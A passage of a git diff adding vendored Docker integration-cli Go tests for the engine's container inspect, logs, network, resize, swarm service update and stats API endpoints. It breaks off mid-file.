"github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions/v1p20" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringutils" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestInspectAPIContainerResponse(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + + cleanedContainerID := strings.TrimSpace(out) + keysBase := []string{"Id", "State", "Created", "Path", "Args", "Config", "Image", "NetworkSettings", + "ResolvConfPath", "HostnamePath", "HostsPath", "LogPath", "Name", "Driver", "MountLabel", "ProcessLabel", "GraphDriver"} + + type acase struct { + version string + keys []string + } + + var cases []acase + + if daemonPlatform == "windows" { + cases = []acase{ + {"v1.25", append(keysBase, "Mounts")}, + } + + } else { + cases = []acase{ + {"v1.20", append(keysBase, "Mounts")}, + {"v1.19", append(keysBase, "Volumes", "VolumesRW")}, + } + } + + for _, cs := range cases { + body := getInspectBody(c, cs.version, cleanedContainerID) + + var inspectJSON map[string]interface{} + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version %s", cs.version)) + + for _, key := range cs.keys { + _, ok := inspectJSON[key] + c.Check(ok, checker.True, check.Commentf("%s does not exist in response for version %s", key, cs.version)) + } + + //Issue #6830: type not properly converted to JSON/back + _, ok := inspectJSON["Path"].(bool) + c.Assert(ok, checker.False, check.Commentf("Path of `true` should not be converted to boolean `true` via JSON marshalling")) + } +} + +func (s *DockerSuite) TestInspectAPIContainerVolumeDriverLegacy(c *check.C) { + // No legacy implications for Windows + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + + cleanedContainerID := strings.TrimSpace(out) + + cases := []string{"v1.19", "v1.20"} + for _, version := range cases { + body := getInspectBody(c, 
version, cleanedContainerID) + + var inspectJSON map[string]interface{} + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version %s", version)) + + config, ok := inspectJSON["Config"] + c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'")) + cfg := config.(map[string]interface{}) + _, ok = cfg["VolumeDriver"] + c.Assert(ok, checker.True, check.Commentf("API version %s expected to include VolumeDriver in 'Config'", version)) + } +} + +func (s *DockerSuite) TestInspectAPIContainerVolumeDriver(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "--volume-driver", "local", "busybox", "true") + + cleanedContainerID := strings.TrimSpace(out) + + body := getInspectBody(c, "v1.25", cleanedContainerID) + + var inspectJSON map[string]interface{} + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version 1.25")) + + config, ok := inspectJSON["Config"] + c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'")) + cfg := config.(map[string]interface{}) + _, ok = cfg["VolumeDriver"] + c.Assert(ok, checker.False, check.Commentf("API version 1.25 expected to not include VolumeDriver in 'Config'")) + + config, ok = inspectJSON["HostConfig"] + c.Assert(ok, checker.True, check.Commentf("Unable to find 'HostConfig'")) + cfg = config.(map[string]interface{}) + _, ok = cfg["VolumeDriver"] + c.Assert(ok, checker.True, check.Commentf("API version 1.25 expected to include VolumeDriver in 'HostConfig'")) +} + +func (s *DockerSuite) TestInspectAPIImageResponse(c *check.C) { + dockerCmd(c, "tag", "busybox:latest", "busybox:mytag") + + endpoint := "/images/busybox/json" + status, body, err := sockRequest("GET", endpoint, nil) + + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var imageJSON types.ImageInspect + err = json.Unmarshal(body, &imageJSON) + c.Assert(err, checker.IsNil, 
check.Commentf("Unable to unmarshal body for latest version")) + c.Assert(imageJSON.RepoTags, checker.HasLen, 2) + + c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:latest"), checker.Equals, true) + c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:mytag"), checker.Equals, true) +} + +// #17131, #17139, #17173 +func (s *DockerSuite) TestInspectAPIEmptyFieldsInConfigPre121(c *check.C) { + // Not relevant on Windows + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + + cleanedContainerID := strings.TrimSpace(out) + + cases := []string{"v1.19", "v1.20"} + for _, version := range cases { + body := getInspectBody(c, version, cleanedContainerID) + + var inspectJSON map[string]interface{} + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for version %s", version)) + config, ok := inspectJSON["Config"] + c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'")) + cfg := config.(map[string]interface{}) + for _, f := range []string{"MacAddress", "NetworkDisabled", "ExposedPorts"} { + _, ok := cfg[f] + c.Check(ok, checker.True, check.Commentf("API version %s expected to include %s in 'Config'", version, f)) + } + } +} + +func (s *DockerSuite) TestInspectAPIBridgeNetworkSettings120(c *check.C) { + // Not relevant on Windows, and besides it doesn't have any bridge network settings + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + containerID := strings.TrimSpace(out) + waitRun(containerID) + + body := getInspectBody(c, "v1.20", containerID) + + var inspectJSON v1p20.ContainerJSON + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil) + + settings := inspectJSON.NetworkSettings + c.Assert(settings.IPAddress, checker.Not(checker.HasLen), 0) +} + +func (s *DockerSuite) TestInspectAPIBridgeNetworkSettings121(c *check.C) { + // Windows doesn't have any bridge network settings + 
testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + containerID := strings.TrimSpace(out) + waitRun(containerID) + + body := getInspectBody(c, "v1.21", containerID) + + var inspectJSON types.ContainerJSON + err := json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil) + + settings := inspectJSON.NetworkSettings + c.Assert(settings.IPAddress, checker.Not(checker.HasLen), 0) + c.Assert(settings.Networks["bridge"], checker.Not(checker.IsNil)) + c.Assert(settings.IPAddress, checker.Equals, settings.Networks["bridge"].IPAddress) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go new file mode 100644 index 0000000000..f49a139c28 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go @@ -0,0 +1,35 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "net/http" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// #16665 +func (s *DockerSuite) TestInspectAPICpusetInConfigPre120(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, cgroupCpuset) + + name := "cpusetinconfig-pre120" + dockerCmd(c, "run", "--name", name, "--cpuset-cpus", "0", "busybox", "true") + + status, body, err := sockRequest("GET", fmt.Sprintf("/v1.19/containers/%s/json", name), nil) + c.Assert(status, check.Equals, http.StatusOK) + c.Assert(err, check.IsNil) + + var inspectJSON map[string]interface{} + err = json.Unmarshal(body, &inspectJSON) + c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal body for version 1.19")) + + config, ok := inspectJSON["Config"] + c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'")) + cfg := config.(map[string]interface{}) + _, ok = cfg["Cpuset"] + c.Assert(ok, checker.True, check.Commentf("API version 1.19 expected to include Cpuset in 'Config'")) +} 
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go new file mode 100644 index 0000000000..2e8ffa9bdc --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go @@ -0,0 +1,87 @@ +package main + +import ( + "bufio" + "bytes" + "fmt" + "net/http" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestLogsAPIWithStdout(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "-t", "busybox", "/bin/sh", "-c", "while true; do echo hello; sleep 1; done") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + type logOut struct { + out string + res *http.Response + err error + } + chLog := make(chan logOut) + + go func() { + res, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1×tamps=1", id), nil, "") + if err != nil { + chLog <- logOut{"", nil, err} + return + } + defer body.Close() + out, err := bufio.NewReader(body).ReadString('\n') + if err != nil { + chLog <- logOut{"", nil, err} + return + } + chLog <- logOut{strings.TrimSpace(out), res, err} + }() + + select { + case l := <-chLog: + c.Assert(l.err, checker.IsNil) + c.Assert(l.res.StatusCode, checker.Equals, http.StatusOK) + if !strings.HasSuffix(l.out, "hello") { + c.Fatalf("expected log output to container 'hello', but it does not") + } + case <-time.After(20 * time.Second): + c.Fatal("timeout waiting for logs to exit") + } +} + +func (s *DockerSuite) TestLogsAPINoStdoutNorStderr(c *check.C) { + name := "logs_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + status, body, err := sockRequest("GET", fmt.Sprintf("/containers/%s/logs", name), nil) + c.Assert(status, checker.Equals, http.StatusBadRequest) + c.Assert(err, checker.IsNil) + + expected := "Bad parameters: you must choose at least one stream" + 
c.Assert(getErrorMessage(c, body), checker.Contains, expected) +} + +// Regression test for #12704 +func (s *DockerSuite) TestLogsAPIFollowEmptyOutput(c *check.C) { + name := "logs_test" + t0 := time.Now() + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "sleep", "10") + + _, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "") + t1 := time.Now() + c.Assert(err, checker.IsNil) + body.Close() + elapsed := t1.Sub(t0).Seconds() + if elapsed > 20.0 { + c.Fatalf("HTTP response was not immediate (elapsed %.1fs)", elapsed) + } +} + +func (s *DockerSuite) TestLogsAPIContainerNotFound(c *check.C) { + name := "nonExistentContainer" + resp, _, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "") + c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go new file mode 100644 index 0000000000..1cc66f0900 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go @@ -0,0 +1,353 @@ +package main + +import ( + "encoding/json" + "fmt" + "net" + "net/http" + "net/url" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPINetworkGetDefaults(c *check.C) { + testRequires(c, DaemonIsLinux) + // By default docker daemon creates 3 networks. 
check if they are present + defaults := []string{"bridge", "host", "none"} + for _, nn := range defaults { + c.Assert(isNetworkAvailable(c, nn), checker.Equals, true) + } +} + +func (s *DockerSuite) TestAPINetworkCreateDelete(c *check.C) { + testRequires(c, DaemonIsLinux) + // Create a network + name := "testnetwork" + config := types.NetworkCreateRequest{ + Name: name, + NetworkCreate: types.NetworkCreate{ + CheckDuplicate: true, + }, + } + id := createNetwork(c, config, true) + c.Assert(isNetworkAvailable(c, name), checker.Equals, true) + + // delete the network and make sure it is deleted + deleteNetwork(c, id, true) + c.Assert(isNetworkAvailable(c, name), checker.Equals, false) +} + +func (s *DockerSuite) TestAPINetworkCreateCheckDuplicate(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testcheckduplicate" + configOnCheck := types.NetworkCreateRequest{ + Name: name, + NetworkCreate: types.NetworkCreate{ + CheckDuplicate: true, + }, + } + configNotCheck := types.NetworkCreateRequest{ + Name: name, + NetworkCreate: types.NetworkCreate{ + CheckDuplicate: false, + }, + } + + // Creating a new network first + createNetwork(c, configOnCheck, true) + c.Assert(isNetworkAvailable(c, name), checker.Equals, true) + + // Creating another network with same name and CheckDuplicate must fail + createNetwork(c, configOnCheck, false) + + // Creating another network with same name and not CheckDuplicate must succeed + createNetwork(c, configNotCheck, true) +} + +func (s *DockerSuite) TestAPINetworkFilter(c *check.C) { + testRequires(c, DaemonIsLinux) + nr := getNetworkResource(c, getNetworkIDByName(c, "bridge")) + c.Assert(nr.Name, checker.Equals, "bridge") +} + +func (s *DockerSuite) TestAPINetworkInspect(c *check.C) { + testRequires(c, DaemonIsLinux) + // Inspect default bridge network + nr := getNetworkResource(c, "bridge") + c.Assert(nr.Name, checker.Equals, "bridge") + + // run a container and attach it to the default bridge network + out, _ := dockerCmd(c, "run", 
"-d", "--name", "test", "busybox", "top") + containerID := strings.TrimSpace(out) + containerIP := findContainerIP(c, "test", "bridge") + + // inspect default bridge network again and make sure the container is connected + nr = getNetworkResource(c, nr.ID) + c.Assert(nr.Driver, checker.Equals, "bridge") + c.Assert(nr.Scope, checker.Equals, "local") + c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, false) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.Containers), checker.Equals, 1) + c.Assert(nr.Containers[containerID], checker.NotNil) + + ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address) + c.Assert(err, checker.IsNil) + c.Assert(ip.String(), checker.Equals, containerIP) + + // IPAM configuration inspect + ipam := &network.IPAM{ + Driver: "default", + Config: []network.IPAMConfig{{Subnet: "172.28.0.0/16", IPRange: "172.28.5.0/24", Gateway: "172.28.5.254"}}, + } + config := types.NetworkCreateRequest{ + Name: "br0", + NetworkCreate: types.NetworkCreate{ + Driver: "bridge", + IPAM: ipam, + Options: map[string]string{"foo": "bar", "opts": "dopts"}, + }, + } + id0 := createNetwork(c, config, true) + c.Assert(isNetworkAvailable(c, "br0"), checker.Equals, true) + + nr = getNetworkResource(c, id0) + c.Assert(len(nr.IPAM.Config), checker.Equals, 1) + c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "172.28.0.0/16") + c.Assert(nr.IPAM.Config[0].IPRange, checker.Equals, "172.28.5.0/24") + c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "172.28.5.254") + c.Assert(nr.Options["foo"], checker.Equals, "bar") + c.Assert(nr.Options["opts"], checker.Equals, "dopts") + + // delete the network and make sure it is deleted + deleteNetwork(c, id0, true) + c.Assert(isNetworkAvailable(c, "br0"), checker.Equals, false) +} + +func (s *DockerSuite) TestAPINetworkConnectDisconnect(c *check.C) { + testRequires(c, DaemonIsLinux) + // Create test network + name := "testnetwork" + config := 
types.NetworkCreateRequest{ + Name: name, + } + id := createNetwork(c, config, true) + nr := getNetworkResource(c, id) + c.Assert(nr.Name, checker.Equals, name) + c.Assert(nr.ID, checker.Equals, id) + c.Assert(len(nr.Containers), checker.Equals, 0) + + // run a container + out, _ := dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") + containerID := strings.TrimSpace(out) + + // connect the container to the test network + connectNetwork(c, nr.ID, containerID) + + // inspect the network to make sure container is connected + nr = getNetworkResource(c, nr.ID) + c.Assert(len(nr.Containers), checker.Equals, 1) + c.Assert(nr.Containers[containerID], checker.NotNil) + + // check if container IP matches network inspect + ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address) + c.Assert(err, checker.IsNil) + containerIP := findContainerIP(c, "test", "testnetwork") + c.Assert(ip.String(), checker.Equals, containerIP) + + // disconnect container from the network + disconnectNetwork(c, nr.ID, containerID) + nr = getNetworkResource(c, nr.ID) + c.Assert(nr.Name, checker.Equals, name) + c.Assert(len(nr.Containers), checker.Equals, 0) + + // delete the network + deleteNetwork(c, nr.ID, true) +} + +func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) { + testRequires(c, DaemonIsLinux) + // test0 bridge network + ipam0 := &network.IPAM{ + Driver: "default", + Config: []network.IPAMConfig{{Subnet: "192.178.0.0/16", IPRange: "192.178.128.0/17", Gateway: "192.178.138.100"}}, + } + config0 := types.NetworkCreateRequest{ + Name: "test0", + NetworkCreate: types.NetworkCreate{ + Driver: "bridge", + IPAM: ipam0, + }, + } + id0 := createNetwork(c, config0, true) + c.Assert(isNetworkAvailable(c, "test0"), checker.Equals, true) + + ipam1 := &network.IPAM{ + Driver: "default", + Config: []network.IPAMConfig{{Subnet: "192.178.128.0/17", Gateway: "192.178.128.1"}}, + } + // test1 bridge network overlaps with test0 + config1 := 
types.NetworkCreateRequest{ + Name: "test1", + NetworkCreate: types.NetworkCreate{ + Driver: "bridge", + IPAM: ipam1, + }, + } + createNetwork(c, config1, false) + c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, false) + + ipam2 := &network.IPAM{ + Driver: "default", + Config: []network.IPAMConfig{{Subnet: "192.169.0.0/16", Gateway: "192.169.100.100"}}, + } + // test2 bridge network does not overlap + config2 := types.NetworkCreateRequest{ + Name: "test2", + NetworkCreate: types.NetworkCreate{ + Driver: "bridge", + IPAM: ipam2, + }, + } + createNetwork(c, config2, true) + c.Assert(isNetworkAvailable(c, "test2"), checker.Equals, true) + + // remove test0 and retry to create test1 + deleteNetwork(c, id0, true) + createNetwork(c, config1, true) + c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, true) + + // for networks w/o ipam specified, docker will choose proper non-overlapping subnets + createNetwork(c, types.NetworkCreateRequest{Name: "test3"}, true) + c.Assert(isNetworkAvailable(c, "test3"), checker.Equals, true) + createNetwork(c, types.NetworkCreateRequest{Name: "test4"}, true) + c.Assert(isNetworkAvailable(c, "test4"), checker.Equals, true) + createNetwork(c, types.NetworkCreateRequest{Name: "test5"}, true) + c.Assert(isNetworkAvailable(c, "test5"), checker.Equals, true) + + for i := 1; i < 6; i++ { + deleteNetwork(c, fmt.Sprintf("test%d", i), true) + } +} + +func (s *DockerSuite) TestAPICreateDeletePredefinedNetworks(c *check.C) { + testRequires(c, DaemonIsLinux) + createDeletePredefinedNetwork(c, "bridge") + createDeletePredefinedNetwork(c, "none") + createDeletePredefinedNetwork(c, "host") +} + +func createDeletePredefinedNetwork(c *check.C, name string) { + // Create pre-defined network + config := types.NetworkCreateRequest{ + Name: name, + NetworkCreate: types.NetworkCreate{ + CheckDuplicate: true, + }, + } + shouldSucceed := false + createNetwork(c, config, shouldSucceed) + deleteNetwork(c, name, shouldSucceed) +} + +func 
isNetworkAvailable(c *check.C, name string) bool { + status, body, err := sockRequest("GET", "/networks", nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + nJSON := []types.NetworkResource{} + err = json.Unmarshal(body, &nJSON) + c.Assert(err, checker.IsNil) + + for _, n := range nJSON { + if n.Name == name { + return true + } + } + return false +} + +func getNetworkIDByName(c *check.C, name string) string { + var ( + v = url.Values{} + filterArgs = filters.NewArgs() + ) + filterArgs.Add("name", name) + filterJSON, err := filters.ToParam(filterArgs) + c.Assert(err, checker.IsNil) + v.Set("filters", filterJSON) + + status, body, err := sockRequest("GET", "/networks?"+v.Encode(), nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + nJSON := []types.NetworkResource{} + err = json.Unmarshal(body, &nJSON) + c.Assert(err, checker.IsNil) + c.Assert(len(nJSON), checker.Equals, 1) + + return nJSON[0].ID +} + +func getNetworkResource(c *check.C, id string) *types.NetworkResource { + _, obj, err := sockRequest("GET", "/networks/"+id, nil) + c.Assert(err, checker.IsNil) + + nr := types.NetworkResource{} + err = json.Unmarshal(obj, &nr) + c.Assert(err, checker.IsNil) + + return &nr +} + +func createNetwork(c *check.C, config types.NetworkCreateRequest, shouldSucceed bool) string { + status, resp, err := sockRequest("POST", "/networks/create", config) + if !shouldSucceed { + c.Assert(status, checker.Not(checker.Equals), http.StatusCreated) + return "" + } + + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + var nr types.NetworkCreateResponse + err = json.Unmarshal(resp, &nr) + c.Assert(err, checker.IsNil) + + return nr.ID +} + +func connectNetwork(c *check.C, nid, cid string) { + config := types.NetworkConnect{ + Container: cid, + } + + status, _, err := sockRequest("POST", "/networks/"+nid+"/connect", config) + c.Assert(status, checker.Equals, http.StatusOK) + 
c.Assert(err, checker.IsNil) +} + +func disconnectNetwork(c *check.C, nid, cid string) { + config := types.NetworkConnect{ + Container: cid, + } + + status, _, err := sockRequest("POST", "/networks/"+nid+"/disconnect", config) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) +} + +func deleteNetwork(c *check.C, id string, shouldSucceed bool) { + status, _, err := sockRequest("DELETE", "/networks/"+id, nil) + if !shouldSucceed { + c.Assert(status, checker.Not(checker.Equals), http.StatusOK) + return + } + c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(err, checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go new file mode 100644 index 0000000000..daf1b05d2e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go @@ -0,0 +1,44 @@ +package main + +import ( + "net/http" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestResizeAPIResponse(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40" + status, _, err := sockRequest("POST", endpoint, nil) + c.Assert(status, check.Equals, http.StatusOK) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestResizeAPIHeightWidthNoInt(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + endpoint := "/containers/" + cleanedContainerID + "/resize?h=foo&w=bar" + status, _, err := sockRequest("POST", endpoint, nil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestResizeAPIResponseWhenContainerNotStarted(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + 
cleanedContainerID := strings.TrimSpace(out) + + // make sure the exited container is not running + dockerCmd(c, "wait", cleanedContainerID) + + endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40" + status, body, err := sockRequest("POST", endpoint, nil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + c.Assert(err, check.IsNil) + + c.Assert(getErrorMessage(c, body), checker.Contains, "is not running", check.Commentf("resize should fail with message 'Container is not running'")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go new file mode 100644 index 0000000000..15a21e579f --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go @@ -0,0 +1,39 @@ +// +build !windows + +package main + +import ( + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func setPortConfig(portConfig []swarm.PortConfig) serviceConstructor { + return func(s *swarm.Service) { + if s.Spec.EndpointSpec == nil { + s.Spec.EndpointSpec = &swarm.EndpointSpec{} + } + s.Spec.EndpointSpec.Ports = portConfig + } +} + +func (s *DockerSwarmSuite) TestAPIServiceUpdatePort(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service with a port mapping of 8080:8081. + portConfig := []swarm.PortConfig{{TargetPort: 8081, PublishedPort: 8080}} + serviceID := d.createService(c, simpleTestService, setInstances(1), setPortConfig(portConfig)) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // Update the service: changed the port mapping from 8080:8081 to 8082:8083. 
+ updatedPortConfig := []swarm.PortConfig{{TargetPort: 8083, PublishedPort: 8082}} + remoteService := d.getService(c, serviceID) + d.updateService(c, remoteService, setPortConfig(updatedPortConfig)) + + // Inspect the service and verify port mapping. + updatedService := d.getService(c, serviceID) + c.Assert(updatedService.Spec.EndpointSpec, check.NotNil) + c.Assert(len(updatedService.Spec.EndpointSpec.Ports), check.Equals, 1) + c.Assert(updatedService.Spec.EndpointSpec.Ports[0].TargetPort, check.Equals, uint32(8083)) + c.Assert(updatedService.Spec.EndpointSpec.Ports[0].PublishedPort, check.Equals, uint32(8082)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go new file mode 100644 index 0000000000..23fbdbb740 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go @@ -0,0 +1,310 @@ +package main + +import ( + "encoding/json" + "fmt" + "net/http" + "os/exec" + "runtime" + "strconv" + "strings" + "sync" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +var expectedNetworkInterfaceStats = strings.Split("rx_bytes rx_dropped rx_errors rx_packets tx_bytes tx_dropped tx_errors tx_packets", " ") + +func (s *DockerSuite) TestAPIStatsNoStreamGetCpu(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true;do echo 'Hello'; usleep 100000; done") + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) + c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") + + var v *types.Stats + err = json.NewDecoder(body).Decode(&v) + 
c.Assert(err, checker.IsNil) + body.Close() + + var cpuPercent = 0.0 + + if daemonPlatform != "windows" { + cpuDelta := float64(v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage) + systemDelta := float64(v.CPUStats.SystemUsage - v.PreCPUStats.SystemUsage) + cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0 + } else { + // Max number of 100ns intervals between the previous time read and now + possIntervals := uint64(v.Read.Sub(v.PreRead).Nanoseconds()) // Start with number of ns intervals + possIntervals /= 100 // Convert to number of 100ns intervals + possIntervals *= uint64(v.NumProcs) // Multiple by the number of processors + + // Intervals used + intervalsUsed := v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage + + // Percentage avoiding divide-by-zero + if possIntervals > 0 { + cpuPercent = float64(intervalsUsed) / float64(possIntervals) * 100.0 + } + } + + c.Assert(cpuPercent, check.Not(checker.Equals), 0.0, check.Commentf("docker stats with no-stream get cpu usage failed: was %v", cpuPercent)) +} + +func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo 1") + id := strings.TrimSpace(out) + + getGoRoutines := func() int { + _, body, err := sockRequestRaw("GET", fmt.Sprintf("/info"), nil, "") + c.Assert(err, checker.IsNil) + info := types.Info{} + err = json.NewDecoder(body).Decode(&info) + c.Assert(err, checker.IsNil) + body.Close() + return info.NGoroutines + } + + // When the HTTP connection is closed, the number of goroutines should not increase. 
+ routines := getGoRoutines() + _, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats", id), nil, "") + c.Assert(err, checker.IsNil) + body.Close() + + t := time.After(30 * time.Second) + for { + select { + case <-t: + c.Assert(getGoRoutines(), checker.LessOrEqualThan, routines) + return + default: + if n := getGoRoutines(); n <= routines { + return + } + time.Sleep(200 * time.Millisecond) + } + } +} + +func (s *DockerSuite) TestAPIStatsNetworkStats(c *check.C) { + testRequires(c, SameHostDaemon) + + out, _ := runSleepingContainer(c) + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + // Retrieve the container address + net := "bridge" + if daemonPlatform == "windows" { + net = "nat" + } + contIP := findContainerIP(c, id, net) + numPings := 1 + + var preRxPackets uint64 + var preTxPackets uint64 + var postRxPackets uint64 + var postTxPackets uint64 + + // Get the container networking stats before and after pinging the container + nwStatsPre := getNetworkStats(c, id) + for _, v := range nwStatsPre { + preRxPackets += v.RxPackets + preTxPackets += v.TxPackets + } + + countParam := "-c" + if runtime.GOOS == "windows" { + countParam = "-n" // Ping count parameter is -n on Windows + } + pingout, err := exec.Command("ping", contIP, countParam, strconv.Itoa(numPings)).CombinedOutput() + if err != nil && runtime.GOOS == "linux" { + // If it fails then try a work-around, but just for linux. + // If this fails too then go back to the old error for reporting. + // + // The ping will sometimes fail due to an apparmor issue where it + // denies access to the libc.so.6 shared library - running it + // via /lib64/ld-linux-x86-64.so.2 seems to work around it. 
+ pingout2, err2 := exec.Command("/lib64/ld-linux-x86-64.so.2", "/bin/ping", contIP, "-c", strconv.Itoa(numPings)).CombinedOutput() + if err2 == nil { + pingout = pingout2 + err = err2 + } + } + c.Assert(err, checker.IsNil) + pingouts := string(pingout[:]) + nwStatsPost := getNetworkStats(c, id) + for _, v := range nwStatsPost { + postRxPackets += v.RxPackets + postTxPackets += v.TxPackets + } + + // Verify the stats contain at least the expected number of packets + // On Linux, account for ARP. + expRxPkts := preRxPackets + uint64(numPings) + expTxPkts := preTxPackets + uint64(numPings) + if daemonPlatform != "windows" { + expRxPkts++ + expTxPkts++ + } + c.Assert(postTxPackets, checker.GreaterOrEqualThan, expTxPkts, + check.Commentf("Reported less TxPackets than expected. Expected >= %d. Found %d. %s", expTxPkts, postTxPackets, pingouts)) + c.Assert(postRxPackets, checker.GreaterOrEqualThan, expRxPkts, + check.Commentf("Reported less Txbytes than expected. Expected >= %d. Found %d. 